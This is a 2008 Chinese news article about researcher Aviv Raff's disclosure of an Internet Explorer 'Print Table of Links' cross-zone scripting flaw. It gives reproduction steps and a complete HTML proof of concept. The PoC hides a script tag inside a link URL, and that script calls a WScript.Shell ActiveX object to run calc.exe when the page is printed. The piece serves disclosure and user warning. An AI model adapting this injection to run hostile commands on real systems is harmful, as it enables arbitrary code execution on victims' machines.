研究人员公布IE 0day 可执行任意代码
作者: 独自等待, 出处:IT专家网, 责任编辑: 张帅,
2008-05-15 15:09
传得沸沸扬扬的IE 0day终于在昨天晚些时候由安全研究人员Aviv Raff公布,此类攻击对于习惯对网页进行本地保存的用户,可以触发ActiveX控件发动定向攻击。
【IT专家网独家】传得沸沸扬扬的IE 0day终于在昨天晚些时候由安全研究人员Aviv Raff公布,在Aviv搞的纪念以色列独立日的活动中,Aviv公布了IE 0day的相关细节。(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html)。
这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击(Cross-Zone Scripting )
源文出自:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 "Print Table of Links",在打印一个网页的时候,能够导致执行任意代码。
1.选择“Print Table of Links”选项
2.把保存以下代码为HTML格式,用IE打开,并打印,会执行calc.exe。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)
| <html> <body> Print me with table of links to execute calc.exe <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a> <script>window.print();</script> </body> </html> |
专家指出,此类攻击对于习惯对网页进行本地保存的用户,可以触发ActiveX控件发动定向攻击,因此用户仍需警惕。
IT专家网原创文章,未经许可,严禁转载!
